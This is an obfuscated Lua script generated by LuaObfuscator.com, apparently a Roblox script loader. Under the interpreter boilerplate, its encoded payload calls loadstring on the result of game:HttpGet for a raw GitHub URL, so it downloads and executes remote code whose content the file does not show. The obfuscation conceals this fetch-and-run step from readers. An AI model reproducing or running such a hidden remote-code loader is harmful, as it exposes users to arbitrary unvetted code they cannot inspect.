--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v77=v5(v70,v19);v19=nil;return v77;else return v70;end end end);local function v20(v31,v32,v33) if v33 then local v71=0;local v72;while true do if (v71==(0 -0)) then v72=(v31/(2^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(88 + 467 + (941 -(282 + 595)))))) ;return v72-(v72%1) ;end end else local v73=(933 -(857 + 74))^(v32-((2206 -(1523 + 114)) -(367 + 201))) ;return (((v31%(v73 + v73))>=v73) and ((834 + 94) -((304 -90) + 713))) or (0 + 0) ;end end local function v21() local v34=(1044 + 21) -(68 + 997) ;local v35;while true do if (v34==1) then return v35;end if (v34==((282 + 988) -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + ((961 -(892 + 65)) -3) ;v34=118 -(32 + (202 -117)) ;end end end local function v22() local v36=0;local v37;local v38;while true do if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + ((7 -4) -1) );v18=v18 + ((259 + 93) -(87 + 263)) ;v36=1;end if (v36==(181 -(67 + 113))) then return (v38 * (188 + 68)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -((1799 -(915 + 82)) + 150)) ;return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + 69)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,2 -1 ,12 + 8 ) * (((1488 -(998 + 488)) -0)^((999 + 220) -(1069 + 118)))) + v43 ;local v47=v20(v44,47 -26 ,67 -36 );local v48=((v20(v44,32)==1) and  -(1 + (772 -(201 + 571)))) or (1 -0) ;if (v47==(0 + 0)) then if (v46==0) then return v48 * (791 -(368 + 423)) ;else local v78=0;while true do if (v78==(0 -(1138 -(116 + 1022)))) then v47=19 -(10 + 8) ;v45=(0 -0) -(0 + 0) ;break;end end end elseif (v47==(2489 -(416 + (94 -68)))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((440 -(145 + 293))^(482 -(44 + 386))))) ;end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(862 -(814 + 45))) then return v6(v52);end if (v50==(0 -0)) then v51=nil;if  not v49 then local v95=0 -0 ;while true do if (v95==(0 + 0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=1 + 0 + 0 ;end if (v50==(887 -(261 + 624))) then v52={};for v79=1 -0 , #v51 do v52[v79]=v2(v1(v3(v51,v79,v79)));end v50=9 -6 ;end if (v50==(1081 -(1020 + 60))) then v51=v3(v16,v18,(v18 + v49) -(1424 -(630 + 793)) );v18=v18 + v49 ;v50=6 -4 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(1 + 0)) then else v56=nil;v57=nil;v53=243 -(187 + 54) ;end if (v53~=(784 -(162 + 618))) then else while true do if (v54~=(2 + 0)) then else v59=nil;v60=nil;v54=3;end if (v54==1) then v57=nil;v58=nil;v54=2;end if (v54==3) then v61=nil;while true do local v98=0 + 0 ;while true do if (v98~=1) then else if (v55~=(3 -1)) then else local v105=0;local v106;while true do if (v105~=(0 -0)) then else v106=0;while true do if ((0 + 0)~=v106) then else local v150=0;while true do if ((1636 -(1373 + 263))~=v150) then else for v157=1,v23() do local v158=1000 -(451 + 549) ;local v159;local v160;while true do if (v158==1) then while true do if (v159~=0) then else v160=v21();if (v20(v160,1 + 0 ,1)~=(0 -0)) then else local v165=0;local v166;local v167;local v168;local v169;local v170;while true do if ((0 -0)~=v165) then else local v171=1384 -(746 + 638) ;while true do if (v171==1) then v165=1 + 0 ;break;end if ((0 -0)~=v171) then else v166=341 -(218 + 123) ;v167=nil;v171=1582 -(1535 + 46) ;end end end if (v165~=(1 + 0)) then else v168=nil;v169=nil;v165=2;end if (v165==2) then v170=nil;while true do if (2==v166) then while true do if (v167~=1) then else local v173=0 + 0 ;while true do if (v173~=0) then else local v181=0;while true do if (v181~=1) then else v173=561 -(306 + 254) ;break;end if (v181==0) then v170={v22(),v22(),nil,nil};if (v168==0) then local v184=0;while true do if (v184~=0) then else v170[3]=v22();v170[4]=v22();break;end end elseif (v168==1) then v170[1470 -(899 + 568) ]=v23();elseif (v168==2) then v170[2 + 1 ]=v23() -((4 -2)^16) ;elseif (v168~=(606 -(268 + 335))) then else local v193=0;local v194;local v195;while true do if (v193==(291 -(60 + 230))) then while true do if (v194~=0) then else v195=0;while true do if (v195~=(572 -(426 + 146))) then else v170[3]=v23() -(2^16) ;v170[1 + 3 ]=v22();break;end end break;end end break;end if (v193~=(1456 -(282 + 1174))) then else v194=811 -(569 + 242) ;v195=nil;v193=1;end end end v181=2 -1 ;end end end if (v173~=1) then else v167=1 + 1 ;break;end end end if (v167==(1024 -(706 + 318))) then local v174=0;local v175;local v176;while true do if (v174~=(1252 -(721 + 530))) then else while true do if (v175==(1271 -(945 + 326))) then v176=0 -0 ;while true do if (v176~=0) then else v168=v20(v160,2 + 0 ,3);v169=v20(v160,4,6);v176=1;end if (v176~=1) then else v167=1;break;end end break;end end break;end if (v174==(700 -(271 + 429))) then v175=0;v176=nil;v174=1 + 0 ;end end end if (v167~=3) then else if (v20(v169,1503 -(1408 + 92) ,1089 -(461 + 625) )==(1289 -(993 + 295))) then v170[1 + 3 ]=v61[v170[1175 -(418 + 753) ]];end v56[v157]=v170;break;end if (v167==(1 + 1)) then local v178=0;while true do if (v178~=1) then else v167=3;break;end if (v178~=(0 + 0)) then else local v182=0;local v183;while true do if (0==v182) then v183=0 + 0 ;while true do if (v183~=(0 + 0)) then else if (v20(v169,1,1)~=1) then else v170[531 -(406 + 123) ]=v61[v170[2]];end if (v20(v169,2,2)~=1) then else v170[3]=v61[v170[3]];end v183=1770 -(1749 + 20) ;end if (v183~=1) then else v178=1 + 0 ;break;end end break;end end end end end end break;end if (0==v166) then local v172=1322 -(1249 + 73) ;while true do if (v172==(0 + 0)) then v167=1145 -(466 + 679) ;v168=nil;v172=2 -1 ;end if (v172==1) then v166=2 -1 ;break;end end end if (v166==(1901 -(106 + 1794))) then v169=nil;v170=nil;v166=1 + 1 ;end end break;end end end break;end end break;end if (v158~=0) then else local v163=0 + 0 ;while true do if ((2 -1)==v163) then v158=2 -1 ;break;end if ((114 -(4 + 110))~=v163) then else local v164=0;while true do if (v164~=0) then else v159=584 -(57 + 527) ;v160=nil;v164=1;end if ((1428 -(41 + 1386))==v164) then v163=104 -(17 + 86) ;break;end end end end end end end for v161=1,v23() do v57[v161-1 ]=v28();end v150=1 + 0 ;end if (v150~=(1 -0)) then else v106=1;break;end end end if (v106==(2 -1)) then return v59;end end break;end end end break;end if (v98~=0) then else if (v55==1) then v60=v23();v61={};for v109=167 -(122 + 44) ,v60 do local v110=0;local v111;local v112;local v113;while true do if (v110~=1) then else v113=nil;while true do if (v111~=(0 -0)) then else v112=v21();v113=nil;v111=1;end if (v111~=(3 -2)) then else if (v112==(1 + 0)) then v113=v21()~=0 ;elseif (v112==(1 + 1)) then v113=v24();elseif (v112==(5 -2)) then v113=v25();end v61[v109]=v113;break;end end break;end if (v110==0) then local v148=65 -(30 + 35) ;while true do if ((1 + 0)==v148) then v110=1;break;end if (v148==(1257 -(1043 + 214))) then v111=0 -0 ;v112=nil;v148=1;end end end end end v59[1215 -(323 + 889) ]=v21();v55=5 -3 ;end if (v55~=(580 -(361 + 219))) then else local v108=320 -(53 + 267) ;while true do if (v108==(0 + 0)) then local v144=413 -(15 + 398) ;while true do if (v144==(982 -(18 + 964))) then v56={};v57={};v144=3 -2 ;end if (v144~=(1 + 0)) then else v108=1;break;end end end if (v108==(1 + 0)) then local v145=0;while true do if (0==v145) then v58={};v59={v56,v57,nil,v58};v145=1 + 0 ;end if (v145~=1) then else v108=2;break;end end end if (v108~=(740 -(542 + 196))) then else v55=1;break;end end end v98=1 -0 ;end end end break;end if (v54~=(0 + 0)) then else v55=0;v56=nil;v54=1 + 0 ;end end break;end if (v53~=3) then else v60=nil;v61=nil;v53=4;end if (v53==(0 + 0)) then v54=0 -0 ;v55=nil;v53=2 -1 ;end if (v53==(1553 -(1126 + 425))) then v58=nil;v59=nil;v53=408 -(118 + 287) ;end end end local function v29(v62,v63,v64) local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...) local v81=v66;local v82=v67;local v83=v68;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v96=0,v89 do if (v96>=v83) then v87[v96-v83 ]=v88[v96 + 1 ];else v91[v96]=v88[v96 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v97=0;while true do if (v97==0) then v93=v81[v85];v94=v93[1];v97=1;end if (v97==1) then if (v94<=3) then if (v94<=1) then if (v94==0) then v91[v93[2]]();else do return;end end elseif (v94>2) then local v114;local v115,v116;local v117;local v118;v91[v93[2]]=v64[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v64[v93[3]];v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v117=v91[v93[3]];v91[v118 + 1 ]=v117;v91[v118]=v117[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v115,v116=v84(v91[v118](v13(v91,v118 + 1 ,v93[3])));v86=(v116 + v118) -1 ;v114=0;for v146=v118,v86 do local v147=0;while true do if (v147==0) then v114=v114 + 1 ;v91[v146]=v115[v114];break;end end end v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v91[v118]=v91[v118](v13(v91,v118 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];do return;end else v91[v93[2]]=v64[v93[3]];end elseif (v94<=5) then if (v94>4) then v91[v93[2]]=v93[3];else local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==0) then v133=v93[2];v134,v135=v84(v91[v133](v13(v91,v133 + 1 ,v93[3])));v132=1;end if (v132==1) then v86=(v135 + v133) -1 ;v136=0;v132=2;end if (v132==2) then for v153=v133,v86 do v136=v136 + 1 ;v91[v153]=v134[v136];end break;end end end elseif (v94>6) then local v137=v93[2];local v138=v91[v93[3]];v91[v137 + 1 ]=v138;v91[v137]=v138[v93[4]];else local v142=v93[2];v91[v142]=v91[v142](v13(v91,v142 + 1 ,v86));end v85=v85 + 1 ;break;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403503O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F487964726F53747265616D7A4F2O66696369616C2F4675636B6D656D69646E696768742F6D61696E2F79752O6D7900083O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
